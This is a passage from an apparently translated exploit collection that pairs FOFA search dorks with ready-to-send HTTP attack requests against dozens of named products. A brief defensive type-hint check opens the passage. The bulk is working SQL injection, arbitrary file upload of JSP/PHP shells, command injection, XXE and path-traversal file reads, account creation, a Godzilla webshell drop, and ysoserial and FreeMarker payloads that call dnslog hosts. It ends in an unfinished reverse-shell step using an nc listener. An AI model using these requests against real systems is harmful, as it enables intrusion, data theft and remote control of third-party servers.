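        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}'''
BENIGN = '{"storeID": 17, "page": 1}'                      # constructed
SUSPICIOUS = '{"@type": "com.example.OrderDto", "id": 1}'  # constructed

if __name__ == "__main__":
    for label, body in [("entry 23", FASTJSON_PROBE), ("entry 56", TPLUS_RCE),
                        ("benign", BENIGN), ("unknown hint", SUSPICIOUS)]:
        print(f"{label:13} {assess(body):10} {[c for _, _, c in extract_hints(body)]}")
```

The real fix is on the server (disable autotype in fastjson, and reject __type-driven instantiation in the AjaxPro layer); this check is what a proxy can do in the meantime, and the "suspicious" tier exists because a type hint from a client has no legitimate use on these endpoints even when the class is not on the list.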
57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 has been created
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the directory it is written to, and fileType gives the file type
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 (Synjones) 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it writes a Godzilla (哥斯拉) webshell
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAPPSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi An Xin (奇安信) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QI-ANXIN Wangshen (奇安信网神) SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

